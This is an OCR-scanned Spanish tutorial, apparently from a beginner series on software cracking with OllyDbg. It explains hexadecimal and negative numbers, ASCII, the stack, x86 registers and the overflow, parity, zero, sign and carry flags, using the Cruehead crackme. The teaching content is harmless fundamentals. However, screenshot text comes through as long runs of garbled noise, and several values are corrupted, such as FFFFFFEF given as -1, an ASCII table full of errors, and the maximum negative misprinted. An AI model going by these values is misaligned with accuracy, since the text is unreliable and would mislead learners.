E yE, o sea serian 16 caracteres en total). 


Normalmente a partir de aquí cuando diga un número y no diga a que sistema de numeración pertenece es 
porque es HEXADECIMAL que es el que utiliza OLLYDBG, si son decimales o binarios aclarare 
expresamente. 


Existen formulas matemáticas que no utilizaremos aquí, para convertir números de un sistema al otro, que 
no son muy simpáticas, pero llegado el momento, un cracker realmente usa la CALCULADORA DE 
WINDOWS, que es lo mas rápido y directo y no va a ponerse a hacer cuentas de potencias, sumas etc 
para convertir un numero de un sistema a otro. 


Abramos la CALCULADORA DE WINDOWS y preparémosla 


e Estándar 


Número de E en grupo 


(ue) meme 
0000500 
A ES 


Allí vemos en el menú VER como se puede cambiar a CIENTIFICA. 


E Calculadora 
Edición Wer Ayuda 


OHez (Dec ODct 
MN 


Sta Lee] ] 


O Bin 


(6) Sexagesimal O) Radián 


(eo) 
NON) 


O Centesimal 


E 
603 
aan 


- 
(ue] 

cjaaaa aa 
9) DOORS 


Ed 


1 


fool] 


a 


D Dra 


Allí vemos que por DEFAULT arranca en DECIMAL, y al lado tiene la opción de cambiar a 
HEXADECIMAL (HEX), OCTAL (OCT) y BINARIO (BIN). 


El Octal que representa la numeración con 8 caracteres no es muy usado en cracking pero la calculadora 
trae dicha opción incluida, si se llegara a necesitar. 


Pues para pasar un número de un sistema a otro es muy sencillo, pongo la calculadora en el sistema del 
número que quiero cambiar, por ejemplo si quiero cambiar 55 de DECIMAL a HEXA, pongo la 


calculadora en DECIMAL y tipeo 55. 


E Calculadora 
Edición Yer Ayuda 


OhHex (O Dec JO 0ct OBin 


(O) Sexagesimal O) Radián 


O Centesimal 


Inv Hyp El Retroceso CE le 
ESPE CO O E E 
(sm: ][e0)[ 1) (un) [e JE JEs JE JLo JLo 
eb e poda 
[ cos 3 || e M+ 0 +1 ¿ + = Int 
1/63/03 


Ahora cambio la calculadora a HEXA y automáticamente me lo convierte a ese sistema de numeración 


E Calculadora a) [X) 


Edición Ver Ayuda 


Hex] ODec O0et OBin 


(O Qword O Dword O Word  OByte " 


Om Or | | [etoceso [ce J[ c ] 
[ su] dio Jj [e] [7 ][s ][ 9 ][ + J[m08][ ana 
ooo aaae 

«y ][ 100] [ms] [+ ][2 ][2 J0- J[ 05 ][ noe 

3) ] ([m] [0 ][+]0]0+ JEJE 


Ahí esta 55 decimal equivale a 37. 


Resalte las letras A,B,C,D,E,F para ver que al pasar la calculadora a HEXA se nos habilita la posibilidad 
de teclear las mismas, que estaban deshabilitadas en modo DECIMAL. 


Creo que esta es la forma mas practica de manejarse con los sistemas de numeración, y poder pasar 
valores de uno a otro sin grandes complicaciones. 


NUMEROS NEGATIVOS en HEXADECIMAL 


Esto es lo mas duro de entender por lejos tratemos de ir despacio. 

En el sistema de numeración hexadecimal, como podemos representar los números negativos, ya que no 
se puede poner el signo menos delante como hacemos en la tradicional numeración decimal ? 

Como hago para representar en formato hexadecimal -1 por ejemplo ? 


Pues aquí viene el problema y espero que se entienda. 


Solo tenemos la posibilidad de escribir en hexadecimal desde 00000000 hasta FFFFFFFF, como 
representaríamos los números negativos? 


Pues bien a un genio se le ocurrió que en vez de representar desde 00000000 hasta FFFFFFFF todos 
números positivos, usaríamos la mitad para los positivos y la otra mitad para los negativos. 


Los números positivos van entonces desde 00000000 hasta 7FFFFFEFF y los negativos desde 80000000 
hasta FEFFFFFF. 


POSITIVOS 


000000000 es igual a O decimal 
000000001 es igual a 1 decimal 


7FFFFFFF es igual a 2147483647 decimal (que seria el máximo positivo) 


NEGATIVOS 


FFFFFFEF seria el -1 decimal 
FFFFFFEE seria el -2 decimal 


80000000 seria -2147483648 decimal (que sería el máximo negativo) 


Podemos probar averiguar en la Command Bar el valor de 7FFFFFFF para ello usamos el signo de 
interrogación y a continuación el valor que deseamos pasar a decimal, 


Command ? TT o] HEX: 7FFFFFFF - DEC: 2147483647 - ASCII: Di 


Vemos a la derecha que nos da el valor DECIMAL correspondiente, que es 2147483647 sin problemas. 


Ahora cuando deseamos averiguar el valor de 80000000 que es negativo, vemos que no nos lo muestra 
sigue dando el resultado para 7FFFFFFF (esto es un bug de la Command Bar), así que como podemos 
hallar su valor en OLLYDBG ? 


DOFICOLO| DS DB EY DUIDYNEL YU 45|CK MeT.L 


Command ? 80000000 w | HEX: 7FFFFFFF - DEC: 2147483647 - ASCII: € 


Con este pequeño truquito. 


Vamos a los registros y marcamos EAX 


BO12FFEO 
YC91EB94 ntc 
EBX 7FFOBOGO 


FF 
EDI 70920738 ntc 
EIP 00401000 CR£ 


Ci ES 0023 32€ 
P1 CS 6B1B 
A1 Ss BB23 32 


ZA ters (FPU) 
Increment Plus ntdll 
Decrement Minus 
Zero 
ntdll 
Set to 1 CRACKI 
MARN y 
32bit 
Copy selection to clipboard. CtrkC S2bit 
Copy all registers to clipboard TA 


A E A 


Nos aparece una ventana en la que podemos colocarle a EAX el valor que queremos, así que 
aprovechamos y usamos dicha ventana para hacer las conversiones, en el primer renglón tipeamos el 
valor HEXADECIMAL que queremos convertir y en el segundo renglón nos aparcera el resultado en 
DECIMAL. 


En este caso vemos que 80000000 corresponde al valor -214783648 decimal. 


Modify EAX 
Hexadecimal EN 
Signed [21 47403648] 


Unsigned [21 47483648 
Char [4480 [400 [400 [400 


co 


Si averiguo el valor de FFFFFFFF allí vale -1 decimal. 


Modify EAX | 
Hexadecimal [FFFFFFF 
Signed ls [1 

Unsigned [4294967295 
Char [FF [FF [FF [NSFF 


coc 


Por lo tanto en la ventana de modificar un registro podemos averiguar el valor de números negativos 
perfectamente, luego para salir podemos CANCELAR así no realizamos ningún cambio. 


CARACTERES ASCII 


Uno de los temas que debemos conocer también es la forma en que nuestro sistema escribe datos en la 
pantalla, para eso asigna a cada carácter un valor hexadecimal, de forma que puede interpretar los mismos 
como si fueran letras, números símbolos etc. 


De la teoría de ASM de Caos Reptante le copiamos la tablita jeje allí vemos a continuación el valor 
decimal, en la segunda columna el valor hexadecimal y en la tercera el carácter o sea por ejemplo si 
quiero escribir un espacio en OLLY, tengo que usar el 20 o 32 decimal, cualquier carácter que 
necesitemos, sea letra o numero podemos verlo en esta tablita. 


Dec. Hex. Carac Dec. Hex. Carac Dec. Hex. Caract 


3 ZO MES 64 40 O 96 60 

33 21 65 41 A 2 61 a 
34 22 $ 66 42 B 98 62 b 
00! 623 $ 67 43 C 09 63 Cc 
36 24 $ 68 44 D 100 64 d 
O 2 % 69 45 E 101 65 e 
3001 626 8 70 46 F 102 66 f 

Sa) 27 : 7 47 G 103 67 a 
40 28 ( 72 48 H 104 68 h 
41 29 ) 73 49 | 105 69 

42  2A E 74 4A J 106  6A | 

43  —2B + 75 4B K 107  6B k 
44 2C A 76 4C L 108  6C | 

45 2D = 77 4D M 109 6D m 
40 Ed ; 78 4E N 110% 15666 n 
E AM E 79 4F O 111 6F O 
48 30 0 80 50 E 112 70 p 
A! ES 1 81 51 Q 113 71 a 
JU 32 2 82 52 R ARS 2 r 
51 33 3 83 53 S Sal 23 Ss 
2 34 4 84 54 T 116 74 t 

ad So 5 85 55 U Mela AO u 
54 36 6 86 56 V 118 76 v 
ol AA 7 87 57 W A IA w 
56 38 8 88 58 X 120 78 Xx 
dl SO 9 89 500 y 121 9 v 
58  —3A ; 90 5A Z 122  7A z 
59 ESB : 91 5B [ 123  7B f 

60  3C < 92 5C A 124 7C | 

51 SI — 93 5D 1 25 SAD ) 

$21 SE > 94 5E ÉS 26% EEE SS 
630 SE la 35 5F 12 ESE 


Por lo demás la command bar cuando averiguamos el valor de un numero hexadecimal, nos proporciona 
también el carácter ASCII correspondiente si tuviera, veamos un ejemplo tipeemos en la command bar. 


745 


(3 E0 (% Dr ¡20 DS r£ 
63 6B 20 6D 65 21 98 33 ck met.C 


EE 2 45 y | HEX: 45 - DEC: 69 


Program entry point 


ASCILE E 


Vemos que 45 corresponde a la letra E mayúscula, si en la tabla anterior buscamos 45 en la columna del 
medio que corresponde a hexa vemos que es la letra E 


69 45 = 


Por lo demas en la ventana del DUMP del OLLYDBG, tenemos una columna que muestra los caracteres 
ASCII, si miramos allí mismo en el crackme de CRUEHEAD la ventana del DUMP. 


¡Actress | Hei_dupo A fs) 


pl 


Vemos que al lado de la columna que representa los valores hexadecimales, esta la columna ASCII, 
donde podemos ver resaltadas algunas cadenas de texto compuestas por combinaciones apropiadas de 
caracteres ASCII. 


QUE ES EL STACK O PILA 


El stack o pila es una zona de la memoria, en la cual se van guardando datos que mas adelante deben ser 
recuperados. 

El nombre PILA es porque asemeja un mazo o pila de cartas o barajas que se encuentran en una mesa. 

En dicho mazo, si agregas una nueva carta solo podes hacerlo arriba de la pila y si quiero sacar una será la 
de más arriba de la pila de cartas. 

Esa es la característica principal del stack es como un mazo de cartas, la carta que agregas a la pila ira 
arriba, y será la primera que salga, cuando quites una. 

Ya veremos mas adelante en la explicación de las instrucciones la forma de modificar o agregar y quitar 
Cartas en nuestro mazo, o sea nuestro querido STACK que como recordamos del tute anterior esta 
representado en la parte inferior derecha del OLLYDBG. 


7C816D4F A to kernel32.7C316D4F 
7C9: to . Pl 


STACK 


RACKME. <Modu leEntryPoint 


Bueno creo que ya tienen bastante para quemarse un rato mas la cabeza nos vemos en la parte 3 donde 
explicaremos que son los registros y los flags y para que sirven. 


Hasta la parte 3 
Ricardo Narvaja 
08 de noviembre de 2005 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 3 


QUE SON LOS REGISTROS Y PARA QUE SIRVEN 


Ahora para que sirven y que son exactamente los registros? 

Bueno el procesador necesita asistentes en su tarea de ejecutar los programas. 

Los registros lo ayudan en ello, cuando veamos las instrucciones ASM veremos por ejemplo que no se 
pueden sumar el contenido de dos posiciones de memoria directamente, el procesador tiene que pasar una 
de ellas a un registro y luego sumarla con la otra posición de memoria, este es un ejemplo pero por 
supuesto ciertos registros tienen usos mas específicos veamos. 


ESP apunta al valor superior del stack, vemos en nuestro Crackme de Cruehead como ejemplo. 


Registers (FPU) 
|] EAX 12345678 


B12FFBO 
—-J EDX MLEMÍBiEn: ntdll.Ki 


E BOL2FFCA 


ESI EFFEFFF 
EDI 70920738 ntdllg7c 


EIP 00401008 CRACKME. 


z Ñ ES 0623 32bit Bl 
FS ARA 22hit Al 


ESP vale 12FFc4 y si miramos el stack en OLLY en el mismo momento 


SI6D4F RETURN to kernel32. 70816] 
7C920738|ntdl l.7C920738 
FEFFFFFF 
7FFDFOBO 
80s4A988 


End of SEH chain 
SE handler 
kerne 132. 70816058 


El 
401008| CRACKME. <Modu leEntryPoint> 
60000000 


Vemos que apunta al valor superior de nuestro stack o dicho en forma simpática, a la carta superior de 
nuestro mazo de cartas o barajas. 


EIP es otro registro muy importante apunta a la instrucción que esta siendo ejecutada en este momento 
veamos 


Registers (FPU) 
EAX 123456783 

ECX BO12FFED 

EDX 7C91EB94 ntdl 
EBX 7FFDFB0D 
ESP BO12FFC4 
0012FFFO 
PREFFFFF 


Veamos en el listado del OLLYDBG, que al arrancar el crackme de Cruehead, este paro allí en 401000, 
que es la primera instrucción a ejecutar y por supuesto el valor de EIP cuando esta detenido allí será 
401000. 


144 x UL sie] +0] 1] + ujejmjtiwjn/c]/[x]6/r]- Js] ¿5% 


A BB PUSH 8 pModu le = NULL 
FFo40a00 CALL <JMP.£KERNELS2.GetModuleHandleA) |[LGertiodu leHandleñ 
Caza4000 — [MOU DWORD PTR DS: [4026CA],EAX 

PUSH 8 = NULL 


00 Tit 
F4204000 |PUSH CRACKME. 004620F (st: "No need to disasm the codet” 
A Fin 


le 
dilindowA 
OR EAX, EA%X 


Cc3 
P7FAR Ad?AdanRaA! MAL MMUNRAN PTR NS: Fáa?ardl daran 


Si apreto F7 ejecuta la primera instrucción y pasa a la siguiente. 


ESP BO12FFCO 
EBP 0012FFFO 
ESI FFFFFFFF 


ED t 
F EIP PRO RE 


EIP ahora vale 401002 y en al listado vemos que se ejecuto la primera instrucción y ahora estamos en 
401002. 


[us] 44) 3c]'" d>/ 00) SERE $5 8%] 28) —95)— DUO DE 90) 0) 0) 1) HE 0) US 1) E) E 
5 6h PUSH a pModu le = NULL 

MOU DWORD PTR DS: [4026CA],EAX 

PUSH B 

PUSH CRACKME. 004020F4 


A 


8 FFO40000 
; L Bl 204000 


GetModu LeHandien 


ji er diaa 
00410024 
EEE, 


(stas: = "No 
FindWindowA 
Los otros registros pueden tomar valores variables y sirven para asistir al procesador en las ejecuciones de 


las instrucciones, ECX es usado casi siempre como contador los demás son fluctuantes y asisten en la 
ejecución de programas como veremos en la explicación de cada instrucción. 


Recordamos donde el OLLYDBG nos mostraba el valor de los REGISTROS 


Ax OBBBBAOS 
ECX BB12FFB9 
4 ntdll.KiFastSystenCal LF 


EBP 0B12FFFO 
ESI FFFFFFFF 
EDI 7C920738 ntdll.7C9 


EIP 00401000 CRACKNME. 


Vemos a simple vista que son EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI y ElP 
Esos son los llamados REGISTROS de 32 bits 


OLLYDBG expresa el contenido en hexadecimal, vemos por ejemplo que EAX vale 00000000, y el 
máximo valor que podía tener es FFFFFFFF, si lo pasamos a BINARIO seria 
11111111111111111111111111111111. 


E Calculadora EJO 
Edición Wer Ayuda 


FFFFFFFF 


OH ODec O0ct  OBin (O Owod ODwod OwWod O Byte 


Dinv Oh E E Retroceso CE c 


E Calculadora 


Edición Wer Ayuda 
| 1111111114111141411111111111111 


OHez ODec O0ct  OBin (O Oword ODwod OwWod  OByte 


Vemos que son 32 bits cada uno con la posibilidad de ser O o 1 en numero binario, por eso se llama a 
estos, registros de 32 bits. 


En el lenguaje ASM se pueden operar con partes de los registros de 32 bits, en este caso EAX, puede ser 
subdividido. 


Veamos en el OLLY para más practicidad con un ejemplo: 


Cambiare el valor de EAX a uno que yo quiera en este caso 12345678. 

Abro el OLLYDBG y allí mi programa será el CRACKME DE CRUEHEAD, aunque podría ser 
cualquiera. 

Una vez que arranca y para en el inicio hago clic derecho en EAX y elijo MODIFY 


Increment Plus ntdll 
Decrement Minus 
Set to 1 


ntdll 
CRACE 


Copy selection to clipboard CtrkC EA 


En la ventana que se abre escribo en la línea hexadecimal el valor 12345678 


Modify EAX 


Hexadecimal 
Signed 


Unsigned 


Char [100 [100 400 400 


Queda así 


| Modify EAX 
Hexadecimal 


Signed 


Unsigned 305419896 
Char [va 2 4 Y lx 


0% 3TEBS dll.KiFastSystemCal lRet 
EBX 7FFDOFO0O 
ESP 0B12FFC4 
EBP 0B12FFFO 
ESI FFFFFFFF 
EDI 7C920738 ntdll.7C920738 


EIP 00401000 CRACKME.<Modu leEntryPoint> 


CO ES 0023 32bit OLFFFFFFFF) 
el E llaaaaadas 


Allí vemos como quedo cambiado al valor que yo deseaba, OLLYDBG tiene la particularidad de poner en 
ROJO los valores que se modifican. 


Como decíamos se pueden usar solo partes de EAX, en este caso AX seria el registro de 16 bits o sea las 
cuatro ultimas cifras de EAX, por lo tanto AX valdría en este caso 5678, corroborémoslo en OLLY en el 
commandbar tipeemos 


? AX (ya que el signo de interrogación sirve también para hallar el valor de una expresión o de un 
registro) 


6D|65 21 00 43|ck met.C 
EE £2476lrackme 


Command ? Ax w| ? expression -- Estimate expression 
Program entry point NR 


Cuando apreto ENTER 


Command PAX w | HEX: 5678 - DEC: 22136 - ASCII: Wx€ 


LS 


Vemos que dice 5678 que es lo que suponíamos, AX son las ultimas cuatro cifras de EAX. 
También existen AL y AH, cuales son estos miremos en OLLYDBG 


? AL 

Command ?AL w | HEX: 78 - DEC: 120 - ASCII: x“€ 
a z Az 

?AH 


IAB UESLZA. 6.625 4D.55.20.Z6LcackiMe 


Sommand ? AH w | HEX: 56 - DEC: 86 - ASCII: Vh€ 


O sea si 
EAX=12345678 


AX son las ultimas cuatro cifras 


EAX=12345678 
Xx 


AH la 5 y 6 cifra y a su vez AL las ultimas dos cifras 


EAX=1234 1 


AH AL 


También en la misma forma EBX se puede subdividir en BX, BH y BL y así sucesivamente existen 
subdivisiones para casi todos los otros registros. 


COMO CAMBIAR LOS VALORES DE LOS REGISTROS 

Ya vimos como se pueden cambiar valores de los registros en OLLYDBG, lo que hicimos en EAX se 
puede hacer en los otros registros de la misma forma, marcando el registro que deseamos cambiar de 
valor, luego haciendo CLICK DERECHO-MODIFY, salvo en el caso de EIP, dado que el mismo apunta 
a la instrucción que se esta ejecutando. 


Para cambiar EIP operamos de la siguiente forma: 


Ya que EIP siempre apunta a la instrucción que se va a ejecutar, elegimos una nueva instrucción en el 
listado. 


[0] File View DSUsAE E ida Window Help 


PUSH 6 pModule = NULL 


GetModu leHandleA 


6H Ba 
-. ES FFO40Bg0 
As ca2a4000 


. MOU DWORD PTR DS: [4026C0A],EAX 

. 6A UB PUSH A Title = NULL 

. 68 F4204000 [PUSH CRACKNME. 004020F4 [: lass "No need to 
ES A6B400Ba FindWindowA 
Beca OR EAX, ERX 


MOU DWORD PTR DS: [402064], 4003 
MOU DWORD PTR DS: [402068],CRACKME. lindPy 
MOU DWORD PTR DS:[40206C],8 

MOU DWORD PTR DS: [4828%91,9. 


MAL FAO MARA ATA NA 


Luego que esta marcada como en este ejemplo 40101A, hago en ella CLICK DERECHO-NEW ORIGIN 
HERE y cambiara EIP a 40101A, continuando el programa ejecutándose desde allí. 


[e] File View Debug Plugins Options Window Help 


CERRO EEE TE 


e + PUSH 8 pModu le = NULL 
o ES Frosoooa CALL CIP TEKERNELS2IGerModuleHanalens | Leertoda eHandlen 


||. AS CA204000 — [MOU DWORD PTR DS: [4920CA],EAX 


6 E 50 PUSH 8 Tisle = Noli 
8 F4204909 |PUSH CRACKME. 004920F4 = "No need to d 
: ES Heddoods FinddindouA 
SECO IR EAX, EAX 

24 01 = 

> C705 64204009) MOU DWORD PTR DS: Backup » 

- 0705 68204000|MOU DWORD PTR DS: 

- C78s éC204009| MOU DWORD PTR DS: Copy » 

- C705 70204000|MOU DWORD PTR DS: 

- Al Caz04909 [MOV EAR,DWORD PR Binary » 
ali 0 Port bli 
al: ds PUSH EAX Assemble Space 

+ ES DIG30000 | CALL <JMPISUSERSZ bel ñ 

. AS 78204008 [|MOU DWORD PTR DS:  Labe : 
C[[- $3 aa7reeós  [eusn ¿F98 ARRON 
1||. 6A 0 Comment A 

. reakpo 

| C7as Eb2o4089|MOU DWORD PTR DS: pon 

- 0705 S4204999| MOV DWORD PTR DS: Hittrace » s 
a e eos Eo! 

| Es Faasonas | DAL <JmP.euseRsa Run trace r 

| PESE cazagana| PUSH BuoRO PTR DS 
D||- ea ou PUSH Follow Enter 


. 5] El 
1/|. 68 o0sou00a PUSH 8000 
. 68 B0S0000a [PUSH S000 
1 6ñ sE PUSH 6E Go to » 
: ÉS bósecres | PUSH craneo LAPPED 
* E8 esomanaa [enc enorme ana Follow in Dump o 


5 
Dm 
D 
ho] 
(=] 
pa] 
+3 


igin here 2 32768, 
2768.) 


ESI PEEEFEER 
EDI 7C* 


EIP Pe/O1eIA ( 


QUE SON LOS FLAGS? 


Como vimos en el primer tutorial en OLLYDBG debajo de los registros se encuentran los flags o 
banderas. 


A |Registers (FPU) 


12345678 

DO12FFEO 

7C91EB94 ntdll.KiFastSystemCal lR 
ses 

OO12FFFO FLAGS 
FFFFFFFF 

70920738 csz0738 


¡ACKME. 004B101A 


32bit O(FFEFFFFF) 
32bit O(FFEFFFFF) 
32bit O(FFFFFFFF) 
32bit OLFFEFFFFF) 
32bit 7FFDEGOB(FFF) 
6S 6006 NULL 


Lastfier ERROR_MOD_NOT_FOUND (08 
[aalsla13) (NO,NB,E,BE,NS,PE,GE,LE 


empty -UNORM BCEG 61050104 BaBBA 
empty 0.0 
empty B.0 
empty 6.8 


Vemos que los flags son CPAZSTDyO 


Vemos que solo pueden tener valores de cero o uno, que nos advierten que al ejecutar determinada 
instrucción, ha ocurrido algo, según el flag que sea. 


Vayamos mirando que indica cada uno: 
EL FLAG OO FLAG OVERFLOW (DESBORDAMIENTO) 
Se activa cuando al hacer una operación, el resultado cambia de signo dando un valor incorrecto. 


Miremos en OLLYDBG este ejemplo, como siempre en el CRACKME DE CRUEHEAD de paso vamos 
practicando usar el OLLYDBG. 


Modifico como hicimos antes el valor de EAX a 7FFFFFFF que es el máximo positivo posible. 


EDI e92073e ntdl 
EIP 60401600 CRAC 


A ” ES 0623 32bi 
CS 061B 32bi 
A 5 Ss 0023 32bi 


Ahora le sumare 1, lo cual excederá la posibilidad de EAX de mostrar un resultado positivo ya que 
80000000 ya corresponde a un número negativo 


Para eso apreto la barra espaciadora que me permite escribir instrucciones. 


Assemble at 00401000 


IV Fill with NOP's Cancel | 


Me sale esa ventana donde escribo ADD EAX,1. 


Assemble at 00401000 
[ADD EAx.1 +] 


IV Fill with NOP's Cancel 


Al apretar el botón ASSEMBLE vemos que cambia la instrucción que había antes en 401000 por la que 
yo escribí. 


alex] efi) visi $00 0] +l ojelmltiwjm]clv]Jk]e]e]-/s] 17] 


00401003 90 MOI 
4 90 NOP 

00401005 90 NOP 

00401006]. 90 NOP 


ADD EAX, 1 (ya lo veremos cuando enumeremos y expliquemos las instrucciones) seria sumarle a EAX 
el valor 1, y guardando el resultado en el mismo EAX. 


Veo que antes de ejecutar la línea con F7 el flag O esta en cero 


ElP 00401003 


ES 4B2:< 
CS 0bB1E 
Ss 6B2:3 
DS 4B2:3 
FS 0BSE 
GS 6BBc 


YI 
EFL 00BuB29€ 
STO empty —L 


ODANANDDO 
DDD nn 


Si ejecuto la instrucción con F7 para ver que es lo que ocurre, al realizar dicha operación veo que EAX al 
sumarle 1 se desborda y me muestra 80000000 lo cual traspasa la línea del cambio de signo. 


El FLAG O se activa poniéndose a 1 indicándome que la operación excedió el máximo resultado posible 
y esa es su función indicar cuando ocurra desborde al ejecutar una instrucción. 


e 


ES BB23 3: 
CS 6B1B 3: 
SS 4B23 3: 
DS 4623 3: 
FS 0B3B 3: 
GS 6000 NL 


+= EF 
EFL GBbBaA9S (1 


STO empty ¿HHOF 


STi ammtas A 


OOANRADDAO 


ElFLAG A o AUXILIAR 


Tiene una función similar pero para cuando se realizan operaciones con otros formatos que por ahora no 
nos interesan. 


El FLAG P o PARIDAD 


Dicho flag se activa cuando ejecutamos una instrucción y su resultado es un valor, que pasado a numero 
binario tiene una cantidad par de unos, como por ejemplo 1010, o 1100 o 1111000 que tienen resultados 
cuya cantidad de unos total es par. 


Para probar esto ya que tenemos en el OLLYDBG escrito ADD EAX,1 y como ya ejecutamos esa línea 
para probar el flag anterior, pues la marcamos de nuevo y hacemos CLICK DERECHO-NEW ORIGIN 
HERE lo cual llevara EIP de nuevo a 401000 (volvemos atrás) y a que si apreto F7 se ejecute de nuevo la 
instrucción que escribimos ADD EAX,1. 


_—. 
DD 
ap 


[54x] > 3 


2 NO 
90 HOP 


20 HOP. a 
. AE corosaca MOU DWORD PTR DS: [4020CA],EAX Ñ 
it 
68 F4204000 |PUSH CRACKNME. 004920F4 E 
ES A6040000 FindWin -EF FF 
Beca OR EAX, EAX 
.v74 01 | ETP 60401000 Dyal 
c3 


5 C7as 64204000 , 4003 
+. C705 68204998| MOU DWORD PTR ol Ca 


: C705 70204000| 
. Ál Caz04008 
AS 74204900 


MOU DWORD PTR DS: [402074],EAX NULL 


. 6A 64 PUSH 64 ReroName = 100 ERRÍ 
. 50 PUSH EAX hIn => NULL ds 
+ ES D1930099 LoadIconA 

. AS MOU DWORD PTR DS: [402078],EAX 

- AR AAZEARAR PUSH 7FAR PRareHame = TAR. ARRAMI 


Allí tenemos pues de nuevo justo antes de ejecutar la suma, con EAX valiendo 00000000 y el flag P 
valiendo 1, porque quedo así de la operación anterior, veamos que ocurre cuando le sumamos 1 a EAX 
nuevamente. 


Apretamos F7 


[€] File View Debug Plugins Options Window Help 


max] eu] + EEE a] + 1jejmr[wjn]c/(x/8/r/-/s] 531?) 


00401000, 


isters (FPU) 


NOP 

MOU DWORD PTR DS: [4020CA],EAX 
PUSH CRACKME. 804920F4 

OR EAX,EAX 


= "No need to disasm the codet” 


[Elis = = NULL 
FindilindowA 


20| MOU DWORD PTR DS: [402064], 4003 
00| MOV DWORD PTR DS: TM] » CRACKME. ln Pr 


FS 0038 OO 7FFDFA! 
6S 4009 NI 

O BfWLastErr ERROR_MOD_NO" 
EFL 1090202 (NO,NB,NE, A, | 
sra A pi BCEa a10! 


STÍ emp 
sT2 enc eN 8 


JORD PTR 
mod DWORD PTR DS: 14020741, EAX 
PUSH 64 Rer 
PUSH ERX ñ In 


LoadIconA 
MOU DWORD PTR DS: [402078], EAX 
PUSH 7FOB Rsr 
PUSH a ñ In 


= 100. 
NULL 


= 10C_ARROW 
= NULL 


Vemos que P nos marca 0 porque el resultado que muestra EFAX=00000001 que en binario es 1 y tiene un 
solo 1 o sea un numero impar de unos por eso no se activa. 


Y vuelvo a hacer ahora click derecho en nuestro ADD EAX,1 y de nuevo CLICK DERECHO- NEW 
ORIGIN HERE para volver a sumar 1 y apreto F7. 


CEE ma a EEE] sii 1jejm/T/w]8]c]JxJ8/R]-- Js] ¿3/41?) 


NOP. 
MOU DWORD PTR DS: [4220CA],EAX O 
PUSH _CRACKME . 004929F4 c o need to disasn the codet” 
CALL <JMP. SUSERS2. FindulindowA> 

A; 


MOU DWORD PTR DS: [402064], 4003 
ta Eee Falla DS: E » CRACKME. ln dPr: 


IORD T NÚLL 
HOU DWORD PTR DS: 14020743, ERX 7 


- 50 PUSH _EAX =5 NULL 08 La ERROR_MOD_NOT_ 
. ES DiG30000 | CALL<JMP-2USERS2.LoadIconA> a (NO, NB, NE, A+ NS 


Vemos que EAX que valía uno, al sumarle uno nuevamente, ahora vale 2 que es 10 en binario y sigue el 
resultado teniendo un solo uno por lo cual el flag P no se activo, si repito el procedimiento una vez mas, 
volviendo atrás y apretando F7 para sumarle 1 nuevamente a EAX. 


ECX BB12FFEO 
EDx 7C91EB94 ntdl 
EBX 7FFOBOGO 
ESP BO12FFC4 
EBP BO12FFFO 
ESI FFFFFFFF 
EDI 709206738 ntdl 


AE 


EIP 00461063 CRACt 


CO ES 0023 32bi1 
P1 CS 061B 32bi1 
AB SS 4023 32bi1 
Z 6 DS 0023 32bi1 
SO FS 003B 32bi1 
ul . GS 0006 NULL 
060 LastErr ERROF 
EFL 000090206 (NO,t 


sTO empty UNORM E 


PTA cams 


Ahora EAX vale 3 que en BINARIO es 11 o sea el resultado tiene un numero par de unos por lo cual se 
activo el FLAG P o de paridad. 


Con eso vemos como funciona el susodicho FLAG, al ejecutar una operación solo mira el resultado y si 
el mismo en BINARIO tiene cantidad par de unos, se activa. 


ElFLAG Zo FLAG CERO 


Uno de los más conocidos y usados en el cracking es el FLAG CERO el mismo se activa cuando 
ejecutamos una instrucción y el resultado es cero. 


Podemos volver con CLICK DERECHO-NEW ORIGIN HERE a nuestro ADD EAX,1 de 401000, pero 
cambiemos ahora el valor de EAX a FFFFFFFF que es -1 decimal, de forma de que cuando apretemos F7 
y ejecutemos ADD EAX,1 , sumemos -1 +1 el resultado sea cero a ver si se activa el FLAG Z. 


Vemos que al apretar F7, EAX quedo en cero y como el resultado es cero, se activo el FLAG Z 
poniéndose a uno. 


Registers (FPU) 
ERAX BABABBRA 
ECX BB12FFEO 
EDX 7C91EB94 ntc 
EBX 7FFDBBOO 
ESP BB12FFC4 
EBP 0012FFFO 
ESI FFFFFFFF 
EDI 70920738 ntc 


EIP 600401503 CRE 


C1 ES 0023 32t 
Pi CS 6B1B 32t 
A1' SS ARS2 22 


¡MAIEs 


nm 
05 
DO 


aaa 


DA40m 
DI 


r 


astE 
(aja lala) 


o 


EF 


IE 


3 
4 
) 


Creo que queda claro que dicho flag, se activa cuando el resultado de una instrucción es cero ya veremos 


diversas formas de activarlo mas adelante. 


ElFLAG So FLAG DE SIGNO 


Se activa cuando el resultado de una operación es negativo, o sea si quiero probarlo cambio EAX a 


FFFFFFEF8 que es -8 decimal 


Hexadecimal | FFFFFFFS 
Signed 8 


Unsigned | 4294967288 
Char [FF [NAFF [FF [Fe 


Y vuelvo con NEW ORIGIN HERE a mi ADD EAX,1 al apretar F7 y ejecutarlo, estoy sumando a -8 el 
valor 1, el resultado es FFFFFFF9 que es -7 decimal, el cual es negativo aun por lo cual debería activarse 


el flag de SIGNO probemos en OLLY. 


[€] File View Debug Plugins Options Window Help 


ax] »]11] A ESFskd| 


OP De 
AS Ca2 2940090 [MOL DWORD PTR DS: [4020CAÍSEAX 
204900 [PUSH CRACKME. D04829F4 
| OR EAX,EAX 


MOU DWORD PTR DS: [402064], 4003 
E] 100 [repo ETE DS: 1 EqOS0cCI! O » CRACKME. ln dPr: 
3 


a » 
100 DWORD PTR DS: 14020743, EAX 
PUSH 64 

PUSH _EAX 

MOU DWORD PTR DS:[4020731,EAX 
US 7FOB 


sroName = 109. 
t => NULL 
IconA 


ReroName, = 1DC_ARROW 
hTn<+t — NL 


EDI csco7as ntdll.7C920 
EIP 00401003 CRACKME. 804 
co ES Bosa 32bit O(FFF 


Fl 
Mi ó 
DO 
060 LadErr ERROR_MOD_N 
EFL 00000, (NO, NB, NE, A 


STO empty od BCEa 61 
STi empty 9 


Vemos que al apretar F7 y hacer la suma se activa el flag S de signo quedando a 1, queda claro como 
funciona, resultado negativo de una instrucción se activa el FLAG S. 


EL FLAG Co CARRY FLAG 


Se activa cuando se excede el máximo valor posible que se puede mostrar, si ponemos EAX a FFFFFFFF 
y le sumamos 1 como hicimos las veces anteriores veremos activarse el CARRY FLAG poniéndose a 1. 


AN 


ES 0023 32 


BG LástErr ER 


[mm 
P 
A 
E 
Ss 
7 
D 
0 
EFL 4000902297 (N 


ELFLAGT_,Del 


No los explicaremos por ahora pues son bastante complejos, si lo haremos mas adelante, no tiene mayor 
interés por ahora, ya que vamos a explicar las instrucciones mas sencillas, así que los dejaremos para mas 
adelante. 


